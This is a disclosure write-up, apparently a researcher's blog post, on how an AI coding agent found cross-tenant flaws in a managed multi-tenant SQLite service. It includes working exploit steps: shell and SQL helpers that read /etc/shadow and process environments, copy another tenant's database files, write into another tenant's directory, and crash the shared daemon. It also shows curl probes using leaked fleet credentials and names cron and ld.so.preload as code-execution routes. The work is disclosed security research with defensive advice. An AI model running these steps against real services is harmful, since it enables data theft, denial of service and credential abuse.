How my hackbot walked out of a managed multi-tenant SQL pod

April 23, 2026 · Cloud · Multi-tenant isolation · Agentic security research
The vendor and product names in this post are intentionally redacted. The disclosed issues are still in remediation; this post is about the technique and the agentic loop that surfaced it, not the target. Treat every product name, hostname, and credential string below as a placeholder — the findings are real, but the identifying strings are not the ones I tested against.

I keep a small Claude Code harness around for cloud audits. It is nothing exotic — a global CLAUDE.md with a playbook for authorization-bypass hunting, a few canonical policy templates, bypassPermissions mode for the boring confirmations, and a habit of pointing it at one service at a time. Most engagements are AWS. This one was not.

On a Thursday morning I dropped a single file into the working directory — the connection JSON the vendor hands you when you provision one of their managed SQLite databases — and asked the agent to connect to it. Five hours later I had three Critical reports drafted: cross-tenant raw-database disclosure, cross-tenant filesystem write plus a pod-wide denial of service, and a fleet-wide credential leak that authenticated from the public Internet against the vendor’s observability pipeline. The same SQL primitive sits at the bottom of all three.

This is the diary of the hunt — the prompts I gave, the loops the agent ran, the moments where the human had to step in and the ones where I just got out of the way.

0. The setup

The product is a managed multi-tenant SQLite plane reached over HTTP. You provision a database, you get a connection JSON with a URL and two JWTs — a read/write token and a read-only token. You point any compatible client at the SQL pipeline endpoint, send statements, get rows. From the customer’s perspective there is no console, no SSH, no shell — the JWT and the URL are the entire surface.
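
For orientation, the connection JSON looks roughly like this — the first two field names are the ones probe.sh (below) reads; everything else, including the read-only token's field name, is a placeholder:

{
  "DATABASE_URL": "<SCHEME>://<NS>-<ULID>.<REGION>.<VENDOR_DOMAIN>",
  "DATABASE_AUTH_TOKEN": "<READ_WRITE_JWT>",
  "<READ_ONLY_TOKEN_FIELD>": "<READ_ONLY_JWT>"
}

The <NS> and <ULID> baked into the URL are public identifiers — they come back into play in section 4.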

That is exactly the kind of surface a hackbot should be good at. There is no UI to misclick, no flaky XHR to chase: just one HTTP endpoint, one auth model, and a SQL parser that either runs your statement or rejects it. Everything is deterministic. Everything is transcribable. The agent can iterate as fast as curl can.

1. “What can this JWT actually do?”

Here’s a connection JSON for one of my accounts. Connect to it, then enumerate every SQL primitive an unprivileged customer session is allowed to call.

The first prompt is the only one that matters. If the agent knows what the goal is — map the surface, then push on every joint — it will spend the next hour grinding through SQL functions, pragma statements, virtual tables and extension hooks without further direction.

The agent built a tiny shell helper, probe.sh, that turned every prompt I’d give it after that into a one-line round trip:

#!/usr/bin/env bash
# probe.sh — one SQL statement, one HTTP round trip.
# Usage: ./probe.sh [-s secrets.json] "SELECT ..."
SECRETS="${SECRETS:-secrets.json}"
[ "$1" = "-s" ] && { SECRETS="$2"; shift 2; }
URL="$(jq -r .DATABASE_URL "$SECRETS" | sed 's|^.*://|https://|; s|/$||')<PIPELINE>"
TOK="$(jq -r .DATABASE_AUTH_TOKEN "$SECRETS")"
BODY=$(jq -cn --arg s "$1" '{requests:[{type:"execute",stmt:{sql:$s}},{type:"close"}]}')
curl -s -X POST "$URL" -H "Authorization: Bearer $TOK" \
  -H "Content-Type: application/json" --data-raw "$BODY"

Then it walked the SQLite surface in a loop — SELECT sqlite_version(), then PRAGMA function_list, then PRAGMA module_list. The version string identified a forked SQLite-over-HTTP daemon — standard build, pinned to a recent SQLite release. So far, expected.
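
The whole sweep was one loop over probe.sh — roughly this, with jq pulling the single text cell out of the response shape shown below:

$ for q in "SELECT sqlite_version()" \
           "SELECT group_concat(name, char(10)) FROM pragma_function_list" \
           "SELECT group_concat(name, char(10)) FROM pragma_module_list"; do
    ./probe.sh "$q" | jq -r '.results[0].response.result.rows[0][0].value'
  done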

The function list was not.

$ ./probe.sh "SELECT name FROM pragma_function_list WHERE name IN
              ('readfile','writefile','load_extension','fsdir','sqlite_dbpage')"
{"results":[{"type":"ok","response":{"type":"execute","result":{
  "cols":[{"name":"name"}],
  "rows":[[{"type":"text","value":"readfile"}],
          [{"type":"text","value":"writefile"}],
          [{"type":"text","value":"fsdir"}]]}}}]}

Three names that should never appear on a customer-facing SQL VM. readfile() reads any path the process can open. writefile() writes any path the process can write. fsdir() is a virtual table that walks directory trees. They are the SQLite CLI’s convenience functions, normally only registered for interactive shell use. Here they were exposed to a JWT that any signup form would issue.

2. The first readfile()

The agent did not need any further nudge. It started reading.

$ ./probe.sh "SELECT readfile('/etc/hostname')"   # → <12-CHAR CONTAINER ID>
$ ./probe.sh "SELECT readfile('/etc/os-release')"  # → Debian GNU/Linux 11
$ ./probe.sh "SELECT readfile('/proc/self/status') | grep ^Uid"  # → Uid: 0 0 0 0
$ ./probe.sh "SELECT readfile('/etc/shadow')"      # → root:!:...

The container runs the database daemon as root, on Debian 11. /etc/shadow readable. /proc/self/maps readable. /proc/self/environ readable. The whole filesystem the process can see is on the table.

This is the moment most exploratory audits stop and write the report — “customer JWT can read arbitrary files inside the container” is already a finding. But the interesting question for a multi-tenant database product is not what can you read inside your own container. It is whose data lives in this container besides yours.

3. Two JWTs, same hostname

Here’s a second connection JSON from a different account I own. Same region. Compare the two — if your theory is right, prove they share a filesystem. If they don’t, rule it out.

I created a second database under a different account, downloaded its connection JSON, and dropped it next to the first. The agent ran the same one-liner against both:

$ ./probe.sh -s secrets-attacker.json "SELECT readfile('/etc/hostname')"
<12-CHAR CONTAINER ID>
$ ./probe.sh -s secrets-victim.json   "SELECT readfile('/etc/hostname')"
<12-CHAR CONTAINER ID>       # ← same one

Same 12-character container hostname. Two accounts, two JWTs, one filesystem. The plane co-locates many tenants per pod — the agent had landed both of mine on the same one. From here forward I had a confirmed cross-tenant primitive in hand; the rest of the day was about turning “you can read files” into “you can read their rows.”

4. fsdir() → the neighbour list

The agent walked fsdir() from / downward. The interesting tree was the data root:

$ ./probe.sh "SELECT name FROM fsdir('<DATA_ROOT>','.')
              WHERE name GLOB '<DATA_ROOT>/group_*/*/dbs/*'
              AND name NOT GLOB '<DATA_ROOT>/group_*/*/dbs/*/*' ORDER BY name"

The result was a list of every live customer database co-hosted on the pod, each one keyed by the customer’s chosen namespace. At the time of reporting it returned ten rows — including third-party brand names I will not repeat here, plus a couple of obvious staging environments. The directory layout was uniform:

<DATA_ROOT>/group_<ULID>/<UUID>/dbs/<NS>/{data, data-wal, data-shm, stats.json}

The <ULID> and <NS> for every tenant are public — they appear verbatim in the connection URL the platform hands out. Only the <UUID> is per-deployment, and it is enumerable with one extra fsdir() call. So given any victim’s public connection URL, the attacker can resolve the on-disk path of their data file in two queries.
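
A sketch of that resolution, collapsing the two probes into a single fsdir() call — the GLOB pins <ULID> and <NS> from the victim's public URL, leaving only the per-deployment <UUID> to be discovered. The result is captured as $VICTIM_DIR for the snippets that follow:

$ VICTIM_DIR=$(./probe.sh -s secrets-attacker.json \
    "SELECT name FROM fsdir('<DATA_ROOT>','.')
     WHERE name GLOB '<DATA_ROOT>/group_<ULID>/*/dbs/<NS>'" \
  | jq -r '.results[0].response.result.rows[0][0].value')
$ echo "$VICTIM_DIR"
<DATA_ROOT>/group_<ULID>/<UUID>/dbs/<NS>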

5. The neighbour’s rows

Stop hand-waving on impact. Pick a victim namespace, derive its directory, exfiltrate the SQLite file, open it locally and show me a row.

To make the demonstration safe I used my own second account as the “victim” and seeded a realistic table:

$ ./probe.sh -s secrets-victim.json \
    "CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT,
       password_hash TEXT, ssn_last4 TEXT, card_last4 TEXT)"
$ ./probe.sh -s secrets-victim.json \
    "INSERT INTO users(email,password_hash,ssn_last4,card_last4) VALUES
     ('alice@victim.example','<BCRYPT_A>','4312','1881'),
     ('bob@victim.example','<BCRYPT_B>','9087','2042')"

Then, from the attacker JWT, the agent resolved the victim’s on-disk path and dumped the database files:

$ for f in data data-wal; do
    ./probe.sh -s secrets-attacker.json \
      "SELECT readfile('$VICTIM_DIR/$f')" \
    | python3 -c '
import sys, json, base64
cell = json.load(sys.stdin)["results"][0]["response"]["result"]["rows"][0][0]
b64 = cell["base64"]
sys.stdout.buffer.write(base64.urlsafe_b64decode(b64 + "=" * (-len(b64) % 4)))
' > "$f"
  done
$ file data
data: SQLite 3.x database
$ sqlite3 data "SELECT email,password_hash,ssn_last4,card_last4 FROM users"
alice@victim.example|<BCRYPT_A>|4312|1881
bob@victim.example|<BCRYPT_B>|9087|2042

The two rows the “victim” tenant inserted thirty seconds earlier — bcrypt hashes, SSN-last-4, card-last-4 — came back to a JWT that had never been told the table existed. data-wal matters because uncheckpointed transactions live there; sqlite3 applies it automatically when you open the main file. Every neighbour on the pod is fully exfiltrable using the same recipe; this was Critical #1.

6. Flipping the primitive: writefile()

Now the other direction. Drop a file into the victim’s directory from the attacker JWT, prove the victim can see it. If you can reach RCE without touching another tenant’s paths, do it.

The agent built a second helper that uploads a base64 blob as a typed parameter and writes it via SELECT writefile(?, ?) — a reconstruction is sketched after the demo below. From there the demonstration was a couple of round-trips:

$ MARKER="PWNED_BY_ATTACKER_$(uuidgen)_$(date -u +%s)"
$ ./probe.sh -s secrets-attacker.json \
    "SELECT writefile('$VICTIM_DIR/pwned.txt', '$MARKER')"
$ ./probe.sh -s secrets-victim.json "SELECT readfile('$VICTIM_DIR/pwned.txt')"
PWNED_BY_ATTACKER_<...>

Attacker JWT writes; victim JWT reads back the exact bytes. The cross-tenant write is real.
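
For completeness, here is roughly what that upload helper looks like — a reconstruction, not the agent's verbatim script, and it assumes the pipeline accepts positional args encoded the same way it encodes result cells (text values and base64 blobs):

#!/usr/bin/env bash
# put.sh — write a local file to a remote path via writefile(?, ?).
# Usage: ./put.sh [-s secrets.json] <remote-path> <local-file>
SECRETS="${SECRETS:-secrets.json}"
[ "$1" = "-s" ] && { SECRETS="$2"; shift 2; }
URL="$(jq -r .DATABASE_URL "$SECRETS" | sed 's|^.*://|https://|; s|/$||')<PIPELINE>"
TOK="$(jq -r .DATABASE_AUTH_TOKEN "$SECRETS")"
B64="$(base64 -w0 < "$2")"
BODY=$(jq -cn --arg p "$1" --arg b "$B64" \
  '{requests:[{type:"execute",stmt:{sql:"SELECT writefile(?, ?)",
    args:[{type:"text",value:$p},{type:"blob",base64:$b}]}},{type:"close"}]}')
curl -s -X POST "$URL" -H "Authorization: Bearer $TOK" \
  -H "Content-Type: application/json" --data-raw "$BODY"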

From there the agent flagged the obvious follow-on — writefile() runs as root, and the writable filesystem includes /etc/cron.d/, /etc/ld.so.preload, the container’s entrypoint script, and the daemon’s own binary. Each of those is a one-shot path to in-container code execution. Each of them is also shared with every tenant on the pod, so I held the line and did not exercise them. The vendor’s internal team can do that on a throwaway pod.

What I did exercise was the supervisor. Truncating the victim’s data-wal and data-shm to zero bytes from the attacker JWT crashes the database daemon — not just the victim’s namespace but the entire shared process — and every tenant on the pod gets 502 Bad Gateway for the ~45 seconds it takes the supervisor to restart. One writefile() call, one shared denial of service. This was Critical #2.
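
The truncation itself is one statement per file — sketched here with the same hypothetical $VICTIM_DIR as above; writefile() with an empty second argument writes a zero-byte file:

$ for f in data-wal data-shm; do
    ./probe.sh -s secrets-attacker.json \
      "SELECT writefile('$VICTIM_DIR/$f', '')"
  done
# → daemon crash; every namespace on the pod returns 502 until the supervisor restarts it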

7. The container ships its own keys

While you have a free readfile(), look at what the daemon’s container itself ships. Anything baked into the image is fair game.

This is the prompt I should have given an hour earlier. The agent walked the daemon’s config directory and found two TOML files. Redacted skeleton:

[backup]
backupinterval = "1m"
[s3.<region-a>]
access   = "<S3_ACCESS_KEY>"
secret   = "<S3_SECRET>"
endpoint = "http://<INTERNAL_IP>:<PORT>"
metastore_bucket = "<METASTORE_BUCKET>"
data_bucket      = "<DATA_BUCKET>"
[s3.<region-b>]
access   = "<S3_ACCESS_KEY>"   # same key, both regions
...
[tls_client]
cert = """-----BEGIN CERTIFICATE-----
...<FLEET-WIDE CN>, <PLATFORM INTERMEDIATE CA>, valid 2024 → 2034...
-----END EC PRIVATE KEY-----"""

Three credential sets, all readable by any customer JWT:

  1. S3 keypair for the backup and metastore buckets — the buckets that hold every tenant’s SQLite backup plus the metastore (namespace-to-DB mapping and tenant auth-token state). One key for both regions. Backup interval one minute.
  2. Cluster mTLS client cert + EC private key, with a generic non-per-pod CN, signed by the platform’s intermediate CA, with server-side SANs pointing at internal raft / admin / rpc hostnames. A fleet-shared identity, valid for nine years.
  3. HTTP Basic credentials, used by the daemon’s sidecar config to ship logs, metrics, and billing events to the platform’s observability ingest.

8. Verifying the ingest credentials from the public Internet

I have explicit approval to verify these three credentials — non-destructive only. For each: confirm whether it actually authenticates from the public Internet, and tell me what an attacker would unlock.

Credentials #1 and #2 turned out to be internal-only — the S3 endpoint is firewalled off the Internet, and the cluster admin / raft / rpc names do not resolve in public DNS. They are still material on a write-side foothold (the writefile() finding gives you exactly that), but they are not directly exploitable from outside.
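
The rule-outs were deliberately boring — reachability only, no authentication attempts. A sketch, with hypothetical hostnames standing in for the redacted ones:

$ dig +short <INTERNAL_ADMIN_HOST>             # no answer — not in public DNS
$ curl -s --connect-timeout 5 "http://<INTERNAL_IP>:<PORT>/"; echo "rc=$?"
rc=28                                          # timed out — the S3 endpoint is firewalled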

The HTTP Basic + mTLS pair was different. The ingest hostname does resolve, the Let's Encrypt chain is valid, and the agent mapped the auth boundary cleanly with empty and deliberately malformed POST bodies:

$ curl --cert <client.crt> --key <client.key> \
       -u "<USER>:<PASS>" -X POST \
       -H 'Content-Length: 0' \
       https://<INGEST_HOST>:<PORT>/billing-events
HTTP/2 200

$ curl --cert <client.crt> --key <client.key> \
       -u "<USER>:WRONG" -X POST -H 'Content-Length: 0' \
       https://<INGEST_HOST>:<PORT>/billing-events
HTTP/2 401

The 200 on an empty body with the correct credentials and the 401 on a wrong password are exactly what you want from an auth-verification probe — the parser only runs after auth succeeds. The deliberately malformed body returns HTTP 400 with a framing error, confirming a well-formed payload would be ingested. From any Internet host with the leaked client cert + Basic credentials, an attacker can:

  1. inject forged billing events for arbitrary tenants into the platform's billing pipeline;
  2. pollute the fleet's logs and metrics — the same telemetry the vendor would presumably use to detect an attack in progress;
  3. do all of it under a fleet-shared identity, so nothing in the credential ties the traffic back to a single pod.

This was Critical #3.

What the harness actually did

I am not pretending the agent did this on its own. There were six or seven control points where the human had to step in — among them: provisioning the second account so the cross-tenant theory could be falsified, deciding to stop short of cron-based RCE in a shared container, choosing which of the three credentials to verify against live infra and which to leave on paper, and writing the actual reports against the program's submission template.

What the harness did do, and did very fast, was the part that usually takes me a day:

  1. build probe.sh so that every hypothesis became a one-line round trip;
  2. sweep the full function and module lists instead of spot-checking the famous names;
  3. grind through readfile() targets — /etc, /proc, the data root — without getting bored;
  4. walk fsdir() from / down to the per-tenant directory layout;
  5. write the base64 exfiltrate-and-decode plumbing on the spot;
  6. run the paired positive/negative probes that make an authorization finding defensible.

The trick is that none of the prompts in this post are clever. They are not jailbreaks, they are not chain-of-thought scaffolds, they are not multi-agent orchestrations. They are the same six or seven sentences any senior pentester would mutter to themselves while looking at an unfamiliar SQL JWT for the first time. The harness just turns muttering into 14 round-trips per minute.

Takeaway for anyone running a managed SQLite plane

Audit the function list of your customer-facing SQL VM. readfile, writefile, fsdir, load_extension and sqlite_dbpage are SQLite CLI conveniences and infrastructure helpers; they have no business on a JWT-served pipeline. While you are at it: don't run the daemon as root inside the container, don't bake live credentials into the image, and assume that any string a customer JWT can reach with SELECT readfile() is, for all practical purposes, public.
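
That audit costs one statement — the same probe my agent opened with, extended to cover both lists (depending on the build, fsdir and sqlite_dbpage register as modules rather than functions). A healthy deployment returns zero rows:

$ ./probe.sh "SELECT name FROM pragma_function_list
              WHERE name IN ('readfile','writefile','load_extension','fsdir','sqlite_dbpage')
              UNION ALL
              SELECT name FROM pragma_module_list
              WHERE name IN ('fsdir','sqlite_dbpage')"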

This was reported through the vendor’s coordinated-disclosure program on the day the primitives were confirmed. Both test databases were owned by me; no third-party tenant data was read, written, or corrupted. Specifics — product names, hostnames, credential strings, version pins — will be added to a follow-up post once the issues are remediated and the disclosure timeline allows.